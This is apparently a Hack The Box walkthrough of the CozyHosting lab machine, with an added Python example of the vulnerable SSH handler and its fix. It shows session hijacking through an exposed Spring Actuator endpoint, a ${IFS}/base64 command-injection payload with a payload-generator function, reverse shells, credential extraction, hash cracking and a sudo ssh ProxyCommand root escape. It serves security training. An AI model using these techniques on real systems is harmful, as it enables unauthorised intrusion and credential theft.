CozyHosting HTB Walkthrough

Introduction

In this post, you will learn how to solve the CozyHosting machine from HTB. If you have any doubts, hop into my Discord server and ask.

Let’s Begin

Hey you ❤️ Please check out my other posts, you will be amazed, and support me by following on YouTube.

https://www.youtube.com/@techyrick-/videos

Add Target to /etc/hosts

Make sure you map the machine's IP address to cozyhosting.htb in /etc/hosts, otherwise the virtual host will not resolve.

Scanning

Begin by running a full-port nmap scan to identify open ports, service versions and the operating system:

sudo nmap -sC -sV -O -p- cozyhosting.htb


Enumeration

When visiting the web page, the only functionality available is the login form, so we run a directory-fuzzing tool against the site.

dirsearch -u http://cozyhosting.htb/

We notice a suspicious directory, /actuator/*, which means Spring Boot Actuator endpoints are exposed without authentication. Browsing to /actuator/sessions lists the active HTTP sessions: one UNAUTHORIZED (anonymous) session and one belonging to the user kanderson, together with their session identifiers. Exposing this endpoint is the real weakness here, because a session ID is as good as a password while the session is alive.

Replacing the value of our own JSESSIONID cookie with kanderson's session ID (for example via Burp Suite) logs us in as that user, and we land on the admin web page.

On the admin page we find a function that configures an SSH connection to a host and username we supply.

Watching the request in Burp Suite, we see a redirect back to the page with the error message in the URL; for an unreachable host it reads 'Connect Time Out', which tells us the server really is invoking an ssh client.

If we leave the username parameter empty, the error message contains ssh's own usage output, which means the username is pasted straight into a shell command line: a command injection vulnerability. The field rejects usernames containing whitespace, so the payload uses ${IFS} (the shell's internal field separator, which expands to space/tab/newline) instead of literal spaces, and base64-encodes the reverse-shell command so that the decoded command may contain spaces:

;echo${IFS}"[ PAYLOAD ]"|base64${IFS}-d|bash;
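To make the bug concrete, here is an added example (not code from the box or from the original post): a small Python stand-in for the SSH-check handler that builds the command by string concatenation and hands it to a shell, next to a hardened version that validates the username and never involves a shell. The target address 10.10.11.230 and the `ssh -o ConnectTimeout=5` command line are assumptions for illustration, and the payload uses `sh` rather than `bash` so it runs on any POSIX system. Running it locally executes only `ssh` with no host (which prints usage and exits), so nothing touches the network.

```python
"""Added example: command injection via an unsanitised SSH username.

The vulnerable handler mimics the pattern found on the box; the ${IFS}
payload is the whitespace-filter bypass used in the walkthrough. All
hosts, command lines and sample commands here are constructed for
illustration, not taken from the target."""
import base64
import re
import subprocess


def vulnerable_ssh_check(host: str, username: str) -> str:
    """The bug: the username is interpolated into a shell command line,
    so shell metacharacters in it (;, |, $) are interpreted."""
    cmd = f"ssh -o ConnectTimeout=5 {username}@{host}"
    proc = subprocess.run(cmd, shell=True, capture_output=True,
                          text=True, timeout=30)
    return proc.stdout


def whitespace_filter(username: str) -> bool:
    """The only guard on the box: refuse usernames containing whitespace.
    ${IFS} contains no literal whitespace character, so it passes."""
    return re.search(r"\s", username) is None


def make_ifs_payload(command: str) -> str:
    """Base64-encode `command` (which may contain spaces) and wrap it in
    an injection string that uses ${IFS} wherever a space is needed."""
    b64 = base64.b64encode(command.encode()).decode()
    return f';echo${{IFS}}"{b64}"|base64${{IFS}}-d|sh;'


def build_ssh_argv(host: str, username: str) -> list:
    """Hardened variant: allow-list both inputs and return an argv list,
    so each value is one argument no matter what characters it holds."""
    if not re.fullmatch(r"[a-z_][a-z0-9_-]{0,31}", username):
        raise ValueError(f"invalid username: {username!r}")
    if not re.fullmatch(r"[A-Za-z0-9.-]+", host):
        raise ValueError(f"invalid host: {host!r}")
    return ["ssh", "-o", "ConnectTimeout=5", f"{username}@{host}"]


def hardened_ssh_check(host: str, username: str) -> int:
    """Runs the validated argv without a shell and returns ssh's exit code."""
    proc = subprocess.run(build_ssh_argv(host, username),
                          capture_output=True, text=True, timeout=30)
    return proc.returncode


if __name__ == "__main__":
    # Constructed sample: a harmless marker instead of a reverse shell.
    payload = make_ifs_payload("echo injected-marker")
    print("payload:", payload)
    print("passes whitespace filter:", whitespace_filter(payload))
    print("vulnerable handler ran:", vulnerable_ssh_check("10.10.11.230", payload).strip())
    try:
        build_ssh_argv("10.10.11.230", payload)
    except ValueError as err:
        print("hardened handler:", err)
```

The stdout captured from the vulnerable handler is the decoded command's output, proving the shell ran it even though `ssh` itself failed. Swapping `echo injected-marker` for a reverse shell is exactly what the walkthrough does; the hardened handler refuses the same string before any process is spawned.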

Next, start a Netcat listener on the port used in the reverse-shell command and submit the payload. The listener receives a connection and we have a shell on the box.

Running ls shows a .jar file in the application's directory. We start a simple HTTP server on the target so we can download the jar to our machine and look inside it:

python3 -m http.server 8083

Once the download finishes, unzip the jar (it is an ordinary zip archive); the application.properties file inside it contains the Postgres username and password.

Before going further, upgrade the reverse shell to a stable, fully interactive terminal. Then check /etc/passwd to identify the users on the machine.

How to stabilize a simple reverse shell to a fully interactive terminal [Click here] to Read More

Now we connect to Postgres with the recovered credentials (substitute the values from application.properties for the variables):

psql "postgresql://$DB_USER:$DB_PWD@$DB_SERVER/$DB_NAME"

Upon successfully connecting to Postgres, let’s explore the contents of the database to see what it holds for us.

PostgreSQL: Basic psql Commands [Click here] to Read More

In the database we find a users table holding usernames and bcrypt password hashes. Save the hashes to a file and crack them with John the Ripper (note that John's options take an equals sign):

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Once a password cracks, try it over SSH against the users found in /etc/passwd.

With the SSH login we have the user flag.

Privilege Escalation

First, let’s inspect the permissions using the following command:

sudo -l

We observe that ssh can be executed as root via sudo without a password. The GTFOBins sudo entry for ssh applies: ssh runs the ProxyCommand option through sh -c, so any command placed there executes as root, and the redirections attach the shell's stdin and stdout to stderr, which ssh leaves connected to our terminal. The host name x is a dummy that is never contacted.

sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x

Now, we can proceed to read the Root flag.

Conclusion

This box is recommended for beginners as it offers an enjoyable experience without being too challenging.
